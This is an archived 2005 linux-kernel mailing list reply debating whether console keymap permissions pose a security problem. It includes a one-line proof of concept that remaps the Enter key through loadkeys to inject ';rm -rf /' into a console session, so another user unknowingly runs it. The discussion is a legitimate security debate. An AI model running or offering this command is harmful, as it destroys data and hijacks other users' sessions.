On Sat, 3 Dec 2005, Andries Brouwer wrote:
> On Sat, Dec 03, 2005 at 03:11:42AM +0100, Bodo Eggert wrote:
> > On Sat, 3 Dec 2005, Andries Brouwer wrote:
> > > Let me repeat what I said and you snipped:
> > > If there is a security problem, then it should be solved in user space.
> >
> > By killing and disabeling all remote logins when root logs in or by
> > ptracing each user program during root sessions? You'd have to do this
> > until we find somebody to do the correct fix in the kernel.
>
> Please describe the perceived security problem.
> I see words, but no problem.
> You log in remotely to my machine. Want to do something evil.
> What precisely do you do?
echo -e 'keycode 28 F70
string F70 ";rm -rf /\x0a"' | loadkeys > /proc/0815/fd/1
where process 0815 is a "sleep 2147483647&"
> 2.0.34% loadkeys -d
> Couldnt get a file descriptor referring to the console
I had stale permissions on /dev/tty0. With correct permission settings,
you'll need a session belonging to the malicious user.
--
'Calm down -- it's only ones and zeros.'
-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to [email protected]
More majordomo info at http://vger.kernel.org/majordomo-info.html
Please read the FAQ at http://www.tux.org/lkml/
[Index of Archives]
[Kernel Newbies]
[Netfilter]
[Bugtraq]
[Photo]
[Stuff]
[Gimp]
[Yosemite News]
[MIPS Linux]
[ARM Linux]
[Linux Security]
[Linux RAID]
[Video 4 Linux]
[Linux for the blind]
[Linux Resources]